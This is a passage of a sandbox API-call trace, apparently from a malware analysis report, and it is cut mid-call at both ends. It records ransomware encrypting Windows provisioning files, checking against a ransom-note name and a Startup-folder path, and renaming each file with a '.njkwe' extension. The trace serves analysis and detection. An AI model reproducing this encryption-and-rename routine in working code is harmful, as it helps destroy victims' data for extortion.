lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9102401b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9102401b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9102401b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2bd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", cAlternateFileName="444__C~1.PRO")) returned 1 [0079.567] lstrcmpiW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.567] lstrcmpiW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.567] lstrcmpiW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.567] lstrcmpiW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.567] lstrcmpiW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.567] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml") returned 158 [0079.567] StrStrIW (lpFirst="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.567] lstrcmpW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.567] lstrcmpW (lpString1="444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.567] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\444__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.567] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\444__connections_cellular_ais (thailand)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.568] GetTickCount () returned 0x115435e [0079.568] GetTickCount () returned 0x115435e [0079.568] GetTickCount () returned 0x115435e [0079.568] GetTickCount () returned 0x115435e [0079.568] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.568] GetProcessHeap () returned 0xbe0000 [0079.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.568] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0079.570] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.570] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2bd, lpOverlapped=0x0) returned 1 [0079.570] GetProcessHeap () returned 0xbe0000 [0079.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.570] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.570] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.570] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.570] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.570] CloseHandle (hObject=0x43c) returned 1 [0079.570] GetProcessHeap () returned 0xbe0000 [0079.570] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.570] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0079.570] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\444__connections_cellular_ais (thailand)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\444__Connections_Cellular_AIS (Thailand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\444__connections_cellular_ais (thailand)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.571] GetProcessHeap () returned 0xbe0000 [0079.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.572] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9102401b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9102401b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9102401b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="445__C~1.PRO")) returned 1 [0079.572] lstrcmpiW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0079.572] lstrcmpiW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0079.572] lstrcmpiW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0079.572] lstrcmpiW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0079.572] lstrcmpiW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0079.572] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0079.572] StrStrIW (lpFirst="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0079.572] lstrcmpW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.572] lstrcmpW (lpString1="445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0079.572] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\445__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.572] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\445__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.572] GetTickCount () returned 0x115435e [0079.572] GetTickCount () returned 0x115435e [0079.572] GetTickCount () returned 0x115435e [0079.572] GetTickCount () returned 0x115435e [0079.572] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.572] GetProcessHeap () returned 0xbe0000 [0079.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.572] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1d9, lpOverlapped=0x0) returned 1 [0079.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.575] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1d9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1d9, lpOverlapped=0x0) returned 1 [0079.575] GetProcessHeap () returned 0xbe0000 [0079.575] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.575] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.575] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.575] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.576] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.576] CloseHandle (hObject=0x43c) returned 1 [0079.579] GetProcessHeap () returned 0xbe0000 [0079.579] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.579] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0079.579] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\445__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\445__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\445__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.580] GetProcessHeap () returned 0xbe0000 [0079.580] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.580] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9102401b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9102401b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9102401b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x287, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", cAlternateFileName="446__C~1.PRO")) returned 1 [0079.580] lstrcmpiW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.580] lstrcmpiW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.580] lstrcmpiW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.580] lstrcmpiW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.580] lstrcmpiW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.580] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml") returned 159 [0079.580] StrStrIW (lpFirst="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.580] lstrcmpW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.580] lstrcmpW (lpString1="446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.580] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\446__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.580] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\446__connections_cellular_dtac (thailand)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.581] GetTickCount () returned 0x115436e [0079.581] GetTickCount () returned 0x115436e [0079.581] GetTickCount () returned 0x115436e [0079.581] GetTickCount () returned 0x115436e [0079.581] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.581] GetProcessHeap () returned 0xbe0000 [0079.581] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.581] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0079.582] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd79, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.583] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x287, lpOverlapped=0x0) returned 1 [0079.583] GetProcessHeap () returned 0xbe0000 [0079.583] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.583] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.583] CloseHandle (hObject=0x43c) returned 1 [0079.583] GetProcessHeap () returned 0xbe0000 [0079.583] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.583] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0079.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\446__connections_cellular_dtac (thailand)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\446__Connections_Cellular_DTAC (Thailand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\446__connections_cellular_dtac (thailand)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.584] GetProcessHeap () returned 0xbe0000 [0079.584] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.584] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9102401b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9102401b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9102401b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", cAlternateFileName="447__C~1.PRO")) returned 1 [0079.584] lstrcmpiW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.584] lstrcmpiW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.584] lstrcmpiW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.584] lstrcmpiW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.584] lstrcmpiW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.584] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml") returned 161 [0079.584] StrStrIW (lpFirst="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.584] lstrcmpW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.584] lstrcmpW (lpString1="447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.584] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\447__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.584] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\447__connections_cellular_orange (thailand)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.585] GetTickCount () returned 0x115436e [0079.585] GetTickCount () returned 0x115436e [0079.585] GetTickCount () returned 0x115436e [0079.585] GetTickCount () returned 0x115436e [0079.585] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.585] GetProcessHeap () returned 0xbe0000 [0079.585] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.585] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0079.586] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.586] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x307, lpOverlapped=0x0) returned 1 [0079.586] GetProcessHeap () returned 0xbe0000 [0079.586] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.586] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.587] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.587] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.587] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.587] CloseHandle (hObject=0x43c) returned 1 [0079.587] GetProcessHeap () returned 0xbe0000 [0079.587] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.587] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\447__Connections_Cellular_Orange (Thailand)_i0$(__MVID)@WAP.provxml" (normalized: 